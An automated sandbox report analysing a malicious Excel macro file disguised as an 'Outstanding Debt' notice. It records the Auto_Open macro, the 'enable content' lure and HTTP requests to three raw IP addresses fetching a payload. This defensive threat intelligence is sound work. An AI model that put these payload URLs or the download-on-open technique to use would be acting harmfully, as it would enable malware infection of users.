
Analysis Report Outstanding-Debt-1636503299-05042021.xlsm

Overview

General Information

Sample Name:Outstanding-Debt-1636503299-05042021.xlsm
Analysis ID:404076
MD5:770ec8230138bb271c449bdaf5da519b
SHA1:21a0bde033c46eab8d42e5b6d9431f52f5c6ce48
SHA256:43c9954c68907acc1f1a6e7d5cc90a3043f9da1c8416b079d182865abea734c7
Tags:xlsm

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Allocates a big amount of memory (probably used for heap spraying)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2428 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview


Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: excel.exe | Memory has grown: Private usage: 4MB later: 35MB
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 91.211.91.81:80
Source: global traffic | HTTP traffic detected:
    GET /44313,6048108796.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 91.211.91.81
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /44313,6048108796.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 5.34.179.36
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /44313,6048108796.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 45.153.229.23
    Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknown | TCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknown | TCP traffic detected without corresponding DNS query: 45.153.229.23
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31B3C273.jpg

System Summary:

Found malicious Excel 4.0 Macro
Source: Outstanding-Debt-1636503299-05042021.xlsm | Initial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable editing button from the yellow bar above 22 0 Once you have enabled editing please click Ena
Source: Screenshot number: 4 | Screenshot OCR: Enable Content button from the yellow bar above 23 24 25 26 27 28 29 30 31 32 33 34 35
Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation | OLE, VBA macro: Module Blasr, Function Auto_Open, API Microsoft Excel:Application.Run(:Range) | Name: Auto_Open
Found Excel 4.0 Macro with suspicious formulas
Source: Outstanding-Debt-1636503299-05042021.xlsm | Initial sample: EXEC
Source: Outstanding-Debt-1636503299-05042021.xlsm | OLE, VBA macro line: Private Sub Auto_Open()
Source: VBA code instrumentation | OLE, VBA macro: Module Blasr, Function Auto_Open | Name: Auto_Open
Source: Outstanding-Debt-1636503299-05042021.xlsm | OLE indicator, VBA macros: true
Source: classification engine | Classification label: mal68.expl.evad.winXLSM@1/8@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Outstanding-Debt-1636503299-05042021.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD345.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Window found: window name: SysTabControl32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: Outstanding-Debt-1636503299-05042021.xlsm | Initial sample: OLE zip file path = xl/media/image1.jpg
Source: Outstanding-Debt-1636503299-05042021.xlsm | Initial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Outstanding-Debt-1636503299-05042021.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Outstanding-Debt-1636503299-05042021.xlsm | Initial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Outstanding-Debt-1636503299-05042021.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Scripting32; Exploitation for Client Execution12; At (Linux); At (Windows)
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Privilege Escalation: Extra Window Memory Injection1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Defense Evasion: Masquerading1; Disable or Modify Tools1; Scripting32; Extra Window Memory Injection1
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: File and Directory Discovery1; System Information Discovery1; Query Registry; System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
Command and Control: Non-Application Layer Protocol1; Application Layer Protocol11; Ingress Tool Transfer2; Protocol Impersonation
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud

Behavior Graph

Screenshots

Thumbnails


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Outstanding-Debt-1636503299-05042021.xlsm
  • Detection: 0%, ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

http://45.153.229.23/44313,6048108796.dat
  • 5%, Virustotal
  • Avira URL Cloud: safe
http://5.34.179.36/44313,6048108796.dat
  • 3%, Virustotal
  • Avira URL Cloud: safe
http://91.211.91.81/44313,6048108796.dat
  • 5%, Virustotal
  • Avira URL Cloud: safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

http://45.153.229.23/44313,6048108796.dat
  • Malicious: false
  • Antivirus detection: 5%, Virustotal; Avira URL Cloud: safe
  • Reputation: unknown
http://5.34.179.36/44313,6048108796.dat
  • Malicious: false
  • Antivirus detection: 3%, Virustotal; Avira URL Cloud: safe
  • Reputation: unknown
http://91.211.91.81/44313,6048108796.dat
  • Malicious: false
  • Antivirus detection: 5%, Virustotal; Avira URL Cloud: safe
  • Reputation: unknown

Contacted IPs


Public

91.211.91.81
  • Domain: unknown
  • Country: Ukraine
  • ASN: 206638 (HOSTFORYUA)
  • Malicious: false
5.34.179.36
  • Domain: unknown
  • Country: Ukraine
  • ASN: 204957 (GREENFLOID-ASUA)
  • Malicious: false
45.153.229.23
  • Domain: unknown
  • Country: Russian Federation
  • ASN: 25229 (VOLIA-ASUA)
  • Malicious: false

General Information

Joe Sandbox Version:32.0.0 Black Diamond
Analysis ID:404076
Start date:04.05.2021
Start time:17:30:37
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 39s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Outstanding-Debt-1636503299-05042021.xlsm
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal68.expl.evad.winXLSM@1/8@0/3
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match: GREENFLOID-ASUA (associated sample name, detection, context IP)
  • tetup.exe, malicious, 107.181.174.176
  • ba820cf3_by_Libranalysis.exe, malicious, 195.123.238.191
  • a8331229_by_Libranalysis.exe, malicious, 195.123.238.191
  • 5f0e0f15_by_Libranalysis.exe, malicious, 195.123.238.191
  • 2f50000.exe, malicious, 45.90.59.62
  • 9177284661-04302021.xlsm, malicious, 82.118.21.70
  • 9177284661-04302021.xlsm, malicious, 82.118.21.70
  • 9177284661-04302021.xlsm, malicious, 82.118.21.70
  • EgW5u2WYG2.exe, malicious, 45.134.255.99
  • 7IXb5bOTOQ.exe, malicious, 45.134.255.61
  • DU61r0xvZ7.exe, malicious, 82.118.23.184
  • TNT SHIPPING DOC 6753478364.exe, malicious, 91.90.195.7
  • 10ba8cb2_by_Libranalysis.exe, malicious, 195.123.238.191
  • SThy2G7fGR.exe, malicious, 45.134.255.61
  • 65cb803d8339bc32863bd557a882cf2016ad7945b18f3.exe, malicious, 45.134.255.61
  • 73827110_by_Libranalysis.xlsm, malicious, 45.90.59.97
  • 73827110_by_Libranalysis.xlsm, malicious, 45.90.59.97
  • 73827110_by_Libranalysis.xlsm, malicious, 45.90.59.97
  • kVXWdr5oFQ.exe, malicious, 195.123.233.63
  • t.exe, malicious, 195.123.237.105
Match: HOSTFORYUA (associated sample name, detection, context IP)
  • Complaint-1770799750-04302021.xlsm, malicious, 2.56.244.189
  • Complaint-1770799750-04302021.xlsm, malicious, 2.56.244.189
  • Complaint-1505499457-04302021.xlsm, malicious, 2.56.244.189
  • Complaint-1770799750-04302021.xlsm, malicious, 2.56.244.189
  • Complaint-1505499457-04302021.xlsm, malicious, 2.56.244.189
  • Complaint-1505499457-04302021.xlsm, malicious, 2.56.244.189
  • Complaint-937314470-04302021.xlsm, malicious, 2.56.244.189
  • Complaint-937314470-04302021.xlsm, malicious, 2.56.244.189
  • Complaint-793844517-04302021.xlsm, malicious, 2.56.244.189
  • Complaint-937314470-04302021.xlsm, malicious, 2.56.244.189
  • Complaint-793844517-04302021.xlsm, malicious, 2.56.244.189
  • Complaint-793844517-04302021.xlsm, malicious, 2.56.244.189
  • 284225b9_by_Libranalysis.xlsm, malicious, 91.211.91.71
  • 284225b9_by_Libranalysis.xlsm, malicious, 91.211.91.71
  • 284225b9_by_Libranalysis.xlsm, malicious, 91.211.91.71
  • 9963433036-04282021.xlsm, malicious, 91.211.91.71
  • 9963433036-04282021.xlsm, malicious, 91.211.91.71
  • 9963433036-04282021.xlsm, malicious, 91.211.91.71
  • 7728839942-04012021.xlsm, malicious, 91.211.91.69
  • 7728839942-04012021.xlsm, malicious, 91.211.91.69
Match: VOLIA-ASUA (associated sample name, detection, context IP)
  • 7D1E.exe, malicious, 77.123.139.190
  • 2f50000.exe, malicious, 91.203.5.165
  • jX16Cu330u.exe, malicious, 77.123.139.190
  • 5jHZqgYHCZ.exe, malicious, 77.123.139.190
  • z3LOkpYy4s.exe, malicious, 77.123.139.190
  • dl6jAtWJeR.exe, malicious, 77.123.139.190
  • YVNw1T4L7m.exe, malicious, 77.123.139.190
  • QsO4ETjF7s.exe, malicious, 77.123.139.190
  • Rk5T3e6g5m.exe, malicious, 77.123.139.190
  • 9b3d7f02.exe, malicious, 91.203.5.155
  • a5DohSoj1A.exe, malicious, 77.123.139.190
  • Informationen,04.21.doc, malicious, 45.137.155.222
  • Informationen,04.21.doc, malicious, 45.137.155.222
  • Informationen,04.21.doc, malicious, 45.137.155.222
  • M04UQNhcL3.docm, malicious, 45.137.155.37
  • M04UQNhcL3.docm, malicious, 45.137.155.37
  • M04UQNhcL3.docm, malicious, 45.137.155.37
  • hj4k7pqZ0S.docm, malicious, 45.137.155.37
  • hj4k7pqZ0S.docm, malicious, 45.137.155.37
  • 3118626595-04152021.xlsm, malicious, 45.153.229.88

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31B3C273.jpg
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:[TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
Category:dropped
Size (bytes):92379
Entropy (8bit):7.654577060340879
Encrypted:false
SSDEEP:1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
MD5:4A425E6A5A885C0D0E2589506FD2244B
SHA1:E23482422480A4720E22F311B42BD65E2F3556F8
SHA-256:76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
SHA-512:3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
Malicious:false
Reputation:moderate, very likely benign file
Preview: ......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..D.G.\.....i].......k.@U.........B..Hw.A...`p;.RsIRHTs..%G?QU.#..$..."...U.A....g].s......c..,....{W'..M.Nc....F.~..y..l..`.e..a..[...P.y]..k_..CI..z.Ru..s.6.Y....."..1]Q......e#.......~.`sk..KH......p.4.i.j+3{.....N.DS..L.....o..o.5f>..jY.uS...Z.B...UG`)..6D....(.....
C:\Users\user\AppData\Local\Temp\A3EE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):120456
Entropy (8bit):7.699429162181314
Encrypted:false
SSDEEP:3072:G1eQIbOz6NIrvKINbjvw548LMb/oqKO8NnS8+60Kcl:G1eROzmAbT648LM7D98Np+Ei
MD5:6C749CE0C8BFA7BFA04C3355CA83EDFB
SHA1:B1E7FAF52D7541D1481190E28D4BA195E1ABF43E
SHA-256:2D7D54F24D2D63A7BFCDFEE9F8CCFF675D0EBA9BD36CC8F89D031256CA073D20
SHA-512:007A5DAFD75E41F6FAE7E6C729FE0FC6B2A221F243684FE74B6FFA7692CCACC17BA7C57A7DD9F7716EF118C24DA219CB5C43A9910C465F6D2A0DB88A0A9B8CCF
Malicious:false
Reputation:low
Preview: .U.n.0....?...".....r.y...I>.&..m.$H...K...$$@.zQ;.3\p..V.K.AYS..:"..a.2uE...._.....5P.5.r=..m..v...6."M..7cA4..@...+3.[.....q..5.....k".X.A&.[.......~.t2U..7...UE.sZ...Q.4..... .xi........VS..2.G.....rz.a..V....Xh..?P....rZ.....T..;..._.A.$....?.E..J.W..Sk..<or..%..h.-.-....>.k\.7Qg.re`.v........$.........5d..............4?{.:.&...,_?>?......B.-CFu....p..1.T.z..cw.!=.M-....}.....3..7...r.......;ap.7.B.e.N[...v......z..T]:........c.`.Nx....W.<..r.O........PK..........!.........*.......[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):162688
Entropy (8bit):4.254358929051396
Encrypted:false
SSDEEP:1536:C6JL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CkJNSc83tKBAvQVCgOtmXmLpLm4l
MD5:D908E0736D41F58F5938E9F740F4EB3E
SHA1:FC1B4B8AF0C482C2324D98E448324C793A7B2112
SHA-256:882196C7E244BE7E6E1843E2E98A2015C85940962CE58A68D4C592C75BB9D0A2
SHA-512:107331B1FECE8AB0F844CB58E5BB53324EE131942B2F2631E0806A8FC85A7A89558CF29713FB33A1EA335813FA5FE42EB8EF9BC54D76287CA1ED8199DDCB049D
Malicious:false
Reputation:low
Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue May 4 23:31:43 2021, atime=Tue May 4 23:31:43 2021, length=8192, window=hide
Category:dropped
Size (bytes):867
Entropy (8bit):4.477057553097468
Encrypted:false
SSDEEP:12:85QMMk0LgXg/XAlCPCHaXtB8XzB/YFX+Wnicvb/bDtZ3YilMMEpxRljKTTdJP9TK:85rMV/XTd6jIYevDv3qKrNru/
MD5:46612982C3AEA7317186DC5DA10101C6
SHA1:0B9E2315BCDC24D90412B0D098F9B2262A42CA64
SHA-256:3E5D988D0EC298A68A4EE4B48096FB2F76BCC4F18F06437E6F7ECB587EFC328F
SHA-512:A99F54818821285A0D4C0476E542D658A37F1DB60F974F4D1D45BECC6D43D4068EAB0A8DDDB1ED76939CC2CEF5303EFEF2A6B91B8F321CF0B244D10D8B3DC729
Malicious:false
Reputation:low
Preview: L..................F...........7G...c*.FA...c*.FA... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\783875\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......783875..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Outstanding-Debt-1636503299-05042021.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Tue May 4 23:31:43 2021, atime=Tue May 4 23:31:43 2021, length=120466, window=hide
Category:dropped
Size (bytes):2298
Entropy (8bit):4.55595359312966
Encrypted:false
SSDEEP:48:8W/XT0jFAIvD9N8MKQh2W/XT0jFAIvD9N8MKQ/:8W/XojFAIvBOMKQh2W/XojFAIvBOMKQ/
MD5:3930C7EBB382C712945355D6AD4381AD
SHA1:3C6D56327A74DDB308F2FDE2934C72521EC41A66
SHA-256:F43F3AA04AF32F5EDF50E79F1BB56343203D92E0399D228C8EA9D08EE5920548
SHA-512:B7C1DD9DABA0294A80500E4206A2BB693D18ED5C1886EEC9F4B8243459B87048812EFE249DDFACC81E0CFF6622C6F2FC24CA2AB87BA9B778BE23B15553D882A0
Malicious:false
Reputation:low
Preview: L..................F.... ......{...c*.FA....1.FA...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .OUTSTA~1.XLS..........Q.y.Q.y*...8.....................O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.6.3.6.5.0.3.2.9.9.-.0.5.0.4.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\783875\Users.user\Desktop\Outstanding-Debt-1636503299-05042021.xlsm.@.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.6.3.6.5.0.3.2.9.9.-.0.5.0.4.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):163
Entropy (8bit):4.8778093873393065
Encrypted:false
SSDEEP:3:oyBVomxWhl2Bbmdo0XVK6lyEW92Bbmdo0XVK6lmxWhl2Bbmdo0XVK6lv:djSlzO0Z7W9zO0Z/lzO0Z1
MD5:C5D9AFD3D6ADE4CCEFDEC6126BE2BDCB
SHA1:472B0C4E70D715440626E53B76CD0F5105BDDAFE
SHA-256:0B237C086AB8E25E6A9F4B60CD82AC4AC53E1376E0DA4D60DA977551255F0D8D
SHA-512:6231AE6EC5E9A4844DA4B6E8582F52AF16BFE333D4C846680D33693AA9C02CB01FF300356600191802E029792418B652AEEC87493B74344BA495C4AC1E344CEE
Malicious:false
Reputation:low
Preview: Desktop.LNK=0..[misc]..Outstanding-Debt-1636503299-05042021.LNK=0..Outstanding-Debt-1636503299-05042021.LNK=0..[misc]..Outstanding-Debt-1636503299-05042021.LNK=0..
C:\Users\user\Desktop\84EE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):120466
Entropy (8bit):7.70000301915411
Encrypted:false
SSDEEP:3072:GNT7zR2zarvKINbjvw548LMb/oqKO8NnS8+60KcP:GX2mmAbT648LM7D98Np+EA
MD5:32971DFDE65ACEA2BAF62CD684AF3FA1
SHA1:33CAE7E4D851C2CBE3B47C113E8CF4FD294120CD
SHA-256:5EA534C6542D63AC4DB4B1519DE0BCAC6918D753336A76073A1B4ADAA41CDF39
SHA-512:4E3FDE9CEABF3BA7DDDCEF15932DC4A458270DB2DF2DD449693202E783D678E36F6070797DD2C111176EA6BE1347CF46E928A1AEC576951969473DFE20B9EB7B
Malicious:false
Reputation:low
Preview: .U.n.0....?...".....r.y...I>.&..m.$H...K...$$@.zQ;.3\p..V.K.AYS..:"..a.2uE...._.....5P.5.r=..m..v...6."M..7cA4..@...+3.[.....q..5.....k".X.A&.[.......~.t2U..7...UE.sZ...Q.4..... .xi........VS..2.G.....rz.a..V....Xh..?P....rZ.....T..;..._.A.$....?.E..J.W..Sk..<or..%..h.-.-....>.k\.7Qg.re`.v........$.........5d..............4?{.:.&...,_?>?......B.-CFu....p..1.T.z..cw.!=.M-....}.....3..7...r.......;ap.7.B.e.N[...v......z..T]:........c.`.Nx....W.<..r.O........PK..........!.........*.......[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\Desktop\~$Outstanding-Debt-1636503299-05042021.xlsm
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):330
Entropy (8bit):1.4377382811115937
Encrypted:false
SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:96114D75E30EBD26B572C1FC83D1D02E
SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:true
Reputation:high, very likely benign file
Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:Microsoft Excel 2007+
Entropy (8bit):7.68857711695949
TrID:
  • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
  • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
  • ZIP compressed archive (8000/1) 7.58%
File name:Outstanding-Debt-1636503299-05042021.xlsm
File size:116934
MD5:770ec8230138bb271c449bdaf5da519b
SHA1:21a0bde033c46eab8d42e5b6d9431f52f5c6ce48
SHA256:43c9954c68907acc1f1a6e7d5cc90a3043f9da1c8416b079d182865abea734c7
SHA512:62ff4c914258230d73e372f4c6153c6eabcea6c43e7049c7bee3503ba8c9e02c09615d3fcdd2779d3e765674eedf41f2b68ac2a04a9f91fe4a2633f06223ab81
SSDEEP:3072:1kYvKINbjvw548LMb/oqKO8NnS8+60Kc+ECx:WAbT648LM7D98Np+EdECx
File Content Preview:PK..........!."..R....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon

Icon Hash:e4e2aa8aa4bcbcac

Static OLE Info

General

Document Type:OpenXML
Number of OLE Files:1

OLE File "/opt/package/joesandbox/database/analysis/404076/sample/Outstanding-Debt-1636503299-05042021.xlsm"

Indicators

Has Summary Info:False
Application Name:unknown
Encrypted Document:False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:True

Summary

Author:Rabota
Last Saved By:Noped
Create Time:2015-06-05T18:19:34Z
Last Saved Time:2021-05-04T08:11:27Z
Creating Application:Microsoft Excel
Security:0

Document Summary

Thumbnail Scaling Desired:false
Company:
Contains Dirty Links:false
Shared Document:false
Changed Hyperlinks:false
Application Version:16.0300

Streams with VBA

VBA File Name: Blasr.bas, Stream Size: 1166
General
Stream Path:VBA/Blasr
VBA File Name:Blasr.bas
Stream Size:1166
Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 fd 03 00 00 00 00 00 00 01 00 00 00 1c cc 5e 9c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

